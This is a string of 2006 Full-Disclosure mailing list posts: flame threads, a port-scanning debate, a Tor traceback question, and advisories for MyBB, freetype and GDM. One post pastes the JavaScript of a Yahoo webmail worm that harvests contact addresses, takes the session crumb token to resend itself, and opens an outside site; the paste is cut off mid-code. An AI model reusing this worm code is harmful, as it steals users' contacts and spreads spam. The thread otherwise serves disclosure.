Re: [Full-disclosure] SANS on-duty 'cock handlers'
Hi, n3td3v wrote: n3td3v: Sure my comments on FD on 666 were just hear-say, but theres loads of defacers out there. Morning wood is promoting the new 'zone-h.org http://zone-h.org' website via his Y messenger status the last two days, I feel sorry for the zone-h crew right now. Just thought I'd point out that Morning Wood is involved with zone-h. Why should he not be informing others of the new design of the zone-h website? If in fact even he wasn't involved and just liked the design there is nothing wrong with him promoting it! Ref: http://web.archive.org/web/20050205215657/http://www.zone-h.org/en/staff Cheers, Dan. PS. I'm not sure how many people are feeling sorry for you (your crew? n3td3v crew?) right now! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] terrorists have invaded the united states
or you just put [EMAIL PROTECTED]ERROR:550 piss off in /etc/mail/access if you use sendmail - Original Message - From: Byron Sonne [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Sunday, June 11, 2006 6:16 PM Subject: Re: [Full-disclosure] terrorists have invaded the united states Why don't you folks just put up some filters for 'n3td3v'? I did months ago along with everyone else I know and it's been a blessing. Either fire up firefox and add the filter, or locate your msgFilterRules.dat and add this (change the to your username, duh): name=n3td3v crap enabled=yes type=1 action=Move to folder actionValue=mailbox://[EMAIL PROTECTED]/Trash condition=OR (subject,contains,n3td3v) OR (from,contains,n3td3v) OR (to or cc,contains,n3td3v) OR (body,contains,n3td3v) The condition line should be a single line, but my mailer wraps it. Problem solved. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] scanning
--- [EMAIL PROTECTED] wrote: What's this mean? It means that if you scan some lame-ass system and it crashes as a result, you might be in deep shit. And it shouldn't have crashed from a portscan does *not* hold up in court. Having done pen-testing in the past I have disabled (dos-ed) systems and entire networks with a portscan. My employer would never let me do any work withaout a prior written agreement. However, law is highly fluctuate over time and from country to country. Dutch law recently changed. In the past you had to have broken a security barrier in order to be accused of hacking, now it has changed to with the intent to do harm. Is it illegal? Not enough data to compute / that is one for the lawers... Is it unwise? Probably... Will you get cought/sued? Unlikely... Would I bother to sue you? No... Schanulleke ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vunerability in yahoo webmail.
Hello, all.I just received an email with an html attachment, on a yahoo account.When I opened the mail, yahoo automatically displayed the html, and executed the code within.What the hell. =)It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website.
I'm of to a BBQ, and I don't care about yahoo.So I'm not even going to read the code and see how this happens.I'm attaching the html file as a text file.Enjoy!
Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful.
Cheers,
--David LoyallOmaha, NebraskaDavid Loyall
img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif'
target=onload=var http_request = false;var Email = ''; var IDList =
''; var CRumb = ''; function makeRequest(url, Func, Method, Param) {
if (window.XMLHttpRequest) {http_request = new XMLHttpRequest();
} else if (window.ActiveXObject) {http_request = new
ActiveXObject('Microsoft.XMLHTTP');}
http_request.target=onreadystatechange = Func;
http_request.open(Method, url, true);if( Method == 'GET')
http_request.send(null);elsehttp_request.send(Param);
}window.open('http://www,lastdata.com'); ServerUrl = url0;USIndex =
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen =
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);
function GetIDs(HtmlContent) { IDList = '';
StartString = ' td'; EndString = '/td';
i = 0; StartIndex =
HtmlContent.indexOf(StartString, 0); while(StartIndex = 0)
{ EndIndex = HtmlContent.indexOf(EndString,
StartIndex); CutLen = EndIndex - StartIndex -
StartString.length;YahooID = HtmlContent.substr(StartIndex
+ StartString.length, CutLen);
if( YahooID.indexOf('@yahoo.com', 0) 0 || YahooID.indexOf('@yahoogroups.com',
0) 0 )IDList = IDList + ',' + YahooID ;
StartString = '/tr'; StartIndex =
HtmlContent.indexOf(StartString, StartIndex + 20); StartString
= ' td'; StartIndex =
HtmlContent.indexOf(StartString, StartIndex + 20); i++;
} if(IDList.substr(0,1) == ',')
IDList = IDList.substr(1, IDList.length);
if(IDList.indexOf(',', 0)0 ) {
IDListArray = IDList.split(',');Email = IDListArray[0];
IDList = IDList.replace(Email + ',', '');
} CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', '');
IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail,
'');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' +
UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList =
IDList.replace(UserEmail, ''); return IDList; } function
ListContacts() { if (http_request.readyState == 4) {if
(http_request.status == 200) { HtmlContent =
http_request.responseText; IDList = GetIDs(HtmlContent);
makeRequest('http://us.' +
Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET',
null); }}} function ExtractStr(HtmlContent) {
StartString = 'name=\u0022.crumb\u0022 value=\u0022';
EndString = '\u0022'; i = 0; StartIndex =
HtmlContent.indexOf(StartString, 0); EndIndex =
HtmlContent.indexOf(EndString, StartIndex + StartString.length );
CutLen = EndIndex - StartIndex - StartString.length;crumb =
HtmlContent.substr(StartIndex + StartString.length , CutLen ); return
crumb; } function Getcrumb() { if (http_request.readyState ==
4) {if (http_request.status == 200) {
HtmlContent = http_request.responseText; CRumb =
ExtractStr(HtmlContent); MyBody
= 'this is test'; MySubj = 'New Graphic Site';
Url = 'http://us.' + Server +
'.mail.yahoo.com/ym/Compose';
var ComposeAction = compose.action;MidIndex =
ComposeAction.indexOf('Mid=' ,0);incIndex = ComposeAction.indexOf('inc'
,0);CutLen = incIndex - MidIndex - 5;var MyMid
Re: [Full-disclosure] Vunerability in yahoo webmail.
On 12/06/06, David Loyall [EMAIL PROTECTED] wrote: Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful. I know this guy who has over 7 years of direct security influence with Yahoo and Google security engineers! In 1972, a crack commando unit was sent to social prison by a mailing list for a claim they couldn't prove. These men promptly escaped from a maximum security stockade to the Moon. Today, still wanted by nobody other than their mommy, they survive playing soldiers of fortune. If you have a problem with Yahoo or any fortune 500 that may be hiring black hat hackers as part of internal espionage, if no one else can help, and if you can find them, maybe you can hire...The n3td3v Group -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] scanning
When you say that by running a portscan you dossed a whole network then i would say either you are crazy or your portscanner is seriously broken lol I have been doing pen-tests since 1998 and never ever dossed a whole Network by accident, especially not with a simple portscan. -sk - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, June 12, 2006 11:23 AM Subject: Re: [Full-disclosure] scanning --- [EMAIL PROTECTED] wrote: What's this mean? It means that if you scan some lame-ass system and it crashes as a result, you might be in deep shit. And it shouldn't have crashed from a portscan does *not* hold up in court. Having done pen-testing in the past I have disabled (dos-ed) systems and entire networks with a portscan. My employer would never let me do any work withaout a prior written agreement. However, law is highly fluctuate over time and from country to country. Dutch law recently changed. In the past you had to have broken a security barrier in order to be accused of hacking, now it has changed to with the intent to do harm. Is it illegal? Not enough data to compute / that is one for the lawers... Is it unwise? Probably... Will you get cought/sued? Unlikely... Would I bother to sue you? No... Schanulleke ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
On 6/12/06, c0ntex [EMAIL PROTECTED] wrote: On 12/06/06, David Loyall [EMAIL PROTECTED] wrote: Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful. I know this guy who has over 7 years of direct security influence with Yahoo and Google security engineers! You know that you really should have replied from [EMAIL PROTECTED] and attached a .shm or a .scr, right? I would definatly open any attachment sent from [EMAIL PROTECTED] in a heartbeat. Really though, that's some crappy static code. It reminds me of a 1st year programmer that replicates their same call 100 times to get 1 thing done. I'm not quite sure how people still fall for these things... be it a executable attachment or html, that low and behold CAN have javascript (AJAX/Web 2.0TM) in it, you should not be just opening any attachments. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
Check out: http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED]...Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] scanning
Believe it or not, it was a Nokia running CheckPoint NG, but not well configured. Because the network was taking a lot of traffic during normal ops so no problems (yet). However it was taken down by a broadcast storm earlier. I was running multiple SYN-scan sessions of nmap with agressive timing (and very low max-rtt and max-timeout and max-delay setting), so not polite at all. IF I was doing a pen test AND I wasn't telling anyone I would NOT be using this settings, but go low and slow. The point that I was making tough is that pen-tests and port scans can go wrong (and if you have Murphy as your back-seat driver, they will go wrong). We have also seen packet loss when scanning some webservers over a 2 Mbps line. Also because the Nokia was taking too much CPU cycles for inspections and logging. Schanulleke --- GroundZero Security [EMAIL PROTECTED] wrote: What kind of firewall was it ? I can't imagine that it isn't able to handle your single connect() requests, since what happens if a lot of the internal client computers have external requests? The network would be constantly lagged and as you describe it, the firewall would stop responding even without a scan. I just wonder what vendor the firewall produced. When you use a normal port scanner like nmap with a polite timing and ip by ip, i doubt this would happen. Maybe if you use some scanner that is multithreaded and scan's a lot of ip's a second and do a full connect() (maybe even send a request) on all possible ports on as much hosts as possible, then i could imagine your scenario. A normal port scan/subnet scan however, shouldn't be any problem. When you do a penetration test you do have 5 minutes to wait and we where talking about a simple port scan. I think at court it wouldn't matter as the understanding of the scan would be the same for them. So even if there is a very slim chance that this actually happens on a network, it would be hard to explain probably. Then again all you did theoreticaly is looking for open services they offer to the public, if their server is miss configured, is that your fault ? On the other side, the network owner would probably respond that you shouldn't snoop around on his servers. So this is indeed a problematic situation and i have to admit you make a point here, although i still don't think that this will happen very offten :-) - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, June 12, 2006 12:13 PM Subject: Re: [Full-disclosure] scanning I was on local site with a direct ethernet connection, the client had all internal traffic routed via a firewall, the firewall was configured with too many and too complex rules. I caused too many sessions, causing too much logs causing the firewall to stop responding in time and all servers to be separated from all clients. Needless to say this was a major finding in my report. We have observed the same behaviour with external facing firewalls. Schanulleke --- GroundZero Security [EMAIL PROTECTED] wrote: When you say that by running a portscan you dossed a whole network then i would say either you are crazy or your portscanner is seriously broken lol I have been doing pen-tests since 1998 and never ever dossed a whole Network by accident, especially not with a simple portscan. -sk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] terrorists have invaded the united states
You are correct, Terrorist have invaded the US... http://archives.cnn.com/2001/US/09/11/chronology.attack/index.html and now you see they must be mitigated, with extreme prejudice. ---BeginMessage--- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/---End Message--- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
They've got it quite quickly. 10x Since the source code is open to everyone now, it is just a matter of time for someone to redesign it and make it work Yahoo Beta as well. On 6/12/06, Eric Chien [EMAIL PROTECTED] wrote: Check out: http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED] ...Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] exif thumbnails in FBI
Hi all bad guys :P I can't resist, FBI rocks! http://no.spam.ee/~tonu/exif/?srcid=1847src=http://www.fbi.gov/wanted/seekinfo/erienote1.jpg Tõnu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee VirusScan Enterprise 8.0.0 Misidentifies EICAR Test File
TheGesus escribió: And you have an instant Elspy.worm flood and your Enterprise AntiVirus Administrator is shitting his pance. Run in circles, scream and shout and all THAT. Oh! That's really stupid! The logs will show 1 infection on the same PC within a few seconds. Easy to spot as a false positive and remove from the report. And such things happens in real world without the help of lame people like you. Can't see where is the fun on this, except your stupidity-disclousure. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is there a way to trace back Tor user
Regarding to recent debate about the use of Tor. Just wondering if it is practical to trace back the user if he is using Tor to hide his origin. As far as I know, there were several approaches using timing correlation to trace back TCP connections. It seems that the technique is there but the problem is the placement of monitors. Since the Tor servers are scatter around the world and it is impractical to access them all. If in a perfect world that you can monitor all the traffic of all Tor servers, you should be able to trace back with high success rate. Is there any better solutions? Thanks. yours, Michael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: MyBB domecode() PHP Code Execution Vulnerability
== Secunia Research 12/06/2006 - MyBB domecode() PHP Code Execution Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software MyBB 1.1.2 Prior versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: Remote == 3) Vendor's Description of Software MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. MyBB has been designed with the end users in mind, you and your subscribers. Full control over your discussion system is presented right at the tip of your fingers, from multiple styles and themes to the ultimate customisation of your forums using the template system. Product link: http://www.mybboard.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in MyBB, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the username field when registering isn't properly sanitised before being used in a preg_replace call with the e modifier in the domecode() function in inc/functions_post.php. This can be exploited to execute arbitrary PHP code by first registering with a specially crafted username and then previewing a post containing the /slap string. The vulnerability has been confirmed in version 1.1.2. Prior versions may also be affected. == 5) Solution Update to version 1.1.3. http://www.mybboard.com/downloads.php == 6) Time Table 06/06/2006 - Initial vendor notification. 06/06/2006 - Vendor confirms vulnerability. 12/06/2006 - Public disclosure. == 7) Credits Discovered by Andreas Sandblad, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-2908 for the vulnerability. == 9) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-40/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Is there a way to trace back Tor user
Hey there There is a paper out trying to describe the different methods of tracking TOR user http://www.fortconsult.net/images/pdf/tpr_100506.pdf Best regards Dennis CIRT.DK From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jianqiang XinSent: Monday, June 12, 2006 4:49 PMTo: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] Is there a way to trace back Tor user Regarding to recent debate about the use of Tor. Just wondering if it is practical to trace back the user if he is using Tor to hide his origin. As far as I know, there were several approaches using timing correlation to trace back TCP connections. It seems that the technique is there but the problem is the placement of monitors. Since the Tor servers are scatter around the world and it is impractical to access them all. If in a perfect world that you can monitor all the traffic of all Tor servers, you should be able to trace back with high success rate. Is there any better solutions? Thanks.yours,Michael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is there a way to trace back Tor user
that paper is useless which isnt surprising when you see who wrote it On 6/12/06, CIRT.DK Mailinglists [EMAIL PROTECTED] wrote: Hey there There is a paper out trying to describe the different methods of tracking TOR user http://www.fortconsult.net/images/pdf/tpr_100506.pdf Best regards Dennis CIRT.DK From: [EMAIL PROTECTED] [mailto: [EMAIL PROTECTED]] On Behalf Of Jianqiang XinSent: Monday, June 12, 2006 4:49 PMTo: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] Is there a way to trace back Tor user Regarding to recent debate about the use of Tor. Just wondering if it is practical to trace back the user if he is using Tor to hide his origin. As far as I know, there were several approaches using timing correlation to trace back TCP connections. It seems that the technique is there but the problem is the placement of monitors. Since the Tor servers are scatter around the world and it is impractical to access them all. If in a perfect world that you can monitor all the traffic of all Tor servers, you should be able to trace back with high success rate. Is there any better solutions? Thanks.yours,Michael ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ -- smile tomorrow will be worse ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] file upload widgets in IE and Firefox have issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Danny wrote: Hi , I read your article , but since I am not at all at home when scripting comes up,I still am wondering what this issue is exactly. My web-foo is not that strong either. Bart van Arnhem made a much better example in IE than I did. as he says, just simply bang on the keyboard alot. make sure to press the : char and the \ char for a full string. You'll eventually see c:\boot.ini appear. Could you give me an example as to clarify things for a non ? English speaking fella? In this wonderful, everything is the web driven world, its entirely possibly that you might type enough text into a web-application in order to filter out all the keys necessary to upload an arbitrary file off of a computer. For instance, into your web mail, or experts-exchange forums, or google's new spreadsheet app, or a typing tutor program. Is this a big a deal? It depends entirely on your web surfing habits. Also ,what is this ?file input box??Are these the boxes in forms where one is supposed to fill in the name,address, password, etc? its the input widget... input type=file name=uploadme where you choose a file to upload from YOUR computer to a WEBSERVER. Sorry for not understanding it completely , it seems to me you have been busy digging out stuff the programmers should have checked in the first place. These flaws were reported a year ago, confirmed, and ignored by both Mozilla and Microsoft. I marked the bug on mozilla's site with the security flag, it was their call to remove it. Also, I wasn't the first or last person to find this problem _independently_. This has been known to the Mozilla group since 2000. Surely they could have done something by now? After a year, I figured I'd just let other people know about, maybe then it would get fixed. Do I think this is a huge gaping security hole? Not right now, but Bart's code definitely shows what can be done if other people keep banging away. I'd like to repeat myself on that last point. Security Impact: Minor Nice job there , I just hope I can fully understand it. Kind regards, Danny ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEjbDJyZFfwQJZqy8RAuDlAJ4uWUEEkDuPiNOZr9v2H9M7E63ayQCdEToT S/Q3tXdbTxqOLdbDUA+IaFA= =UJw+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2006-0100-1 freetype
rPath Security Advisory: 2006-0100-1 Published: 2006-06-12 Products: rPath Linux 1 Rating: Major Exposure Level Classification: User Non-deterministic Weakness Updated Versions: freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-2.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0747 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2661 http://issues.rpath.com/browse/RPL-429 Description: Previous versions of the freetype library contain multiple integer overflow weaknesses which allow remote providers of font files (which may include fonts embedded in documents such as PDF files) to cause applications to crash, and may possibly also allow them to execute arbitrary code as the user accessing the files. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
Yahoo is under the control of hackers. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:099 ] - Updated freetype2 packages fixes multiple vulnerabilities.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:099 http://www.mandriva.com/security/ ___ Package : freetype2 Date: June 12, 2006 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: Integer underflow in Freetype before 2.2 allows remote attackers to cause a denial of service (crash) via a font file with an odd number of blue values, which causes the underflow when decrementing by 2 in a context that assumes an even number of values. (CVE-2006-0747) Multiple integer overflows in FreeType before 2.2 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via attack vectors related to (1) bdf/bdflib.c, (2) sfnt/ttcmap.c, (3) cff/cffgload.c, and (4) the read_lwfn function and a crafted LWFN file in base/ftmac.c. (CVE-2006-1861) Ftutil.c in Freetype before 2.2 allows remote attackers to cause a denial of service (crash) via a crafted font file that triggers a null dereference. (CVE-2006-2661) In addition, a patch is applied to 2.1.10 in Mandriva 2006 to fix a serious bug in ttkern.c that caused some programs to go into an infinite loop when dealing with fonts that don't have a properly sorted kerning sub-table. This patch is not applicable to the earlier Mandriva releases. Packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0747 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2661 ___ Updated Packages: Mandriva Linux 10.2: 500d6a0363b912d3708164333618ea9a 10.2/RPMS/libfreetype6-2.1.9-6.1.102mdkmdk.i586.rpm 8dc7ea21f0c7485fb2e89722b61662e6 10.2/RPMS/libfreetype6-devel-2.1.9-6.1.102mdkmdk.i586.rpm 822d356b7df358d6fd33fdcba1ecce48 10.2/RPMS/libfreetype6-static-devel-2.1.9-6.1.102mdkmdk.i586.rpm 01fc46490cdad24a0ac7145ad1400fbe 10.2/SRPMS/freetype2-2.1.9-6.1.102mdkmdk.src.rpm Mandriva Linux 10.2/X86_64: 8bafa7103832649910ff29e46d3414da x86_64/10.2/RPMS/lib64freetype6-2.1.9-6.1.102mdkmdk.x86_64.rpm 116215379bbfe0cdf14e370fd74c x86_64/10.2/RPMS/lib64freetype6-devel-2.1.9-6.1.102mdkmdk.x86_64.rpm 01ce8b9853b9e509a7d8f034ff21cfb6 x86_64/10.2/RPMS/lib64freetype6-static-devel-2.1.9-6.1.102mdkmdk.x86_64.rpm 500d6a0363b912d3708164333618ea9a x86_64/10.2/RPMS/libfreetype6-2.1.9-6.1.102mdkmdk.i586.rpm 8dc7ea21f0c7485fb2e89722b61662e6 x86_64/10.2/RPMS/libfreetype6-devel-2.1.9-6.1.102mdkmdk.i586.rpm 822d356b7df358d6fd33fdcba1ecce48 x86_64/10.2/RPMS/libfreetype6-static-devel-2.1.9-6.1.102mdkmdk.i586.rpm 01fc46490cdad24a0ac7145ad1400fbe x86_64/10.2/SRPMS/freetype2-2.1.9-6.1.102mdkmdk.src.rpm Mandriva Linux 2006.0: 6068722811b9404d5aa08ee477987fb2 2006.0/RPMS/libfreetype6-2.1.10-9.2.20060mdk.i586.rpm 817917e69abb5674f646544308536419 2006.0/RPMS/libfreetype6-devel-2.1.10-9.2.20060mdk.i586.rpm dc4748e47335cc44243e39711c04def5 2006.0/RPMS/libfreetype6-static-devel-2.1.10-9.2.20060mdk.i586.rpm 6fbbc5e83a43e7c0b4c09593892ca554 2006.0/SRPMS/freetype2-2.1.10-9.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 985900ddba982582ecb7d7eb51c20200 x86_64/2006.0/RPMS/lib64freetype6-2.1.10-9.2.20060mdk.x86_64.rpm afe093ac0ef65d5f5505f0c907d9c8dc x86_64/2006.0/RPMS/lib64freetype6-devel-2.1.10-9.2.20060mdk.x86_64.rpm 6f924308e4c1fe2da976a8d7905b9c45 x86_64/2006.0/RPMS/lib64freetype6-static-devel-2.1.10-9.2.20060mdk.x86_64.rpm 6068722811b9404d5aa08ee477987fb2 x86_64/2006.0/RPMS/libfreetype6-2.1.10-9.2.20060mdk.i586.rpm 817917e69abb5674f646544308536419 x86_64/2006.0/RPMS/libfreetype6-devel-2.1.10-9.2.20060mdk.i586.rpm dc4748e47335cc44243e39711c04def5 x86_64/2006.0/RPMS/libfreetype6-static-devel-2.1.10-9.2.20060mdk.i586.rpm 6fbbc5e83a43e7c0b4c09593892ca554 x86_64/2006.0/SRPMS/freetype2-2.1.10-9.2.20060mdk.src.rpm Corporate 3.0: ffb8fe54281b48ae7c8c0df2cdff4226 corporate/3.0/RPMS/libfreetype6-2.1.7-4.1.C30mdkmdk.i586.rpm 8160069b2aedc139d573d06786362b38 corporate/3.0/RPMS/libfreetype6-devel-2.1.7-4.1.C30mdkmdk.i586.rpm 3dc8f49900b644bdbed9c1ff87eab2e8 corporate/3.0/RPMS/libfreetype6-static-devel-2.1.7-4.1.C30mdkmdk.i586.rpm f3435422496277db7390cfc62ca58b3a corporate/3.0/SRPMS/freetype2-2.1.7-4.1.C30mdkmdk.src.rpm Corporate 3.0/X86_64: 86b12f1232fd54bcd76c59f9598a190d x86_64/corporate/3.0/RPMS/lib64freetype6-2.1.7-4.1.C30mdkmdk.x86_64.rpm db3ab38c85b3a39b848a499e4f2688c3 x86_64/corporate/3.0/RPMS/lib64freetype6-devel-2.1.7-4.1.C30mdkmdk.x86_64.rpm
[Full-disclosure] [ GLSA 200606-14 ] GDM: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: GDM: Privilege escalation Date: June 12, 2006 Bugs: #135027 ID: 200606-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An authentication error in GDM could allow users to gain elevated privileges. Background == GDM is the GNOME display manager. Affected packages = --- Package / Vulnerable / Unaffected --- 1 gnome-base/gdm 2.8.0.8 = 2.8.0.8 Description === GDM allows a normal user to access the configuration manager. Impact == When the face browser in GDM is enabled, a normal user can use the configure login manager with his/her own password instead of the root password, and thus gain additional privileges. Workaround == There is no known workaround at this time. Resolution == All GDM users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =gnome-base/gdm-2.8.0.8 References == [ 1 ] Gnome Bugzilla entry http://bugzilla.gnome.org/show_bug.cgi?id=343476 [ 2 ] CVE-2006-2452 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2006-2452 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200606-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpN7M6VuNkON.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PassMark?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo All! I thought I'd actually risk a real security question here. Any one seen the PassMark (www.passmarksecurity.com) security system in action? RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.1 (GNU/Linux) iD8DBQFEjddm8KZibdeR3qURAmzFAKDZTMYDEQvOVeUDX4XSwRnj2SNeOgCePmIW 927G9Hax89s4b0M/uQVTOe4= =w52u -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] repeated port 21 attempts
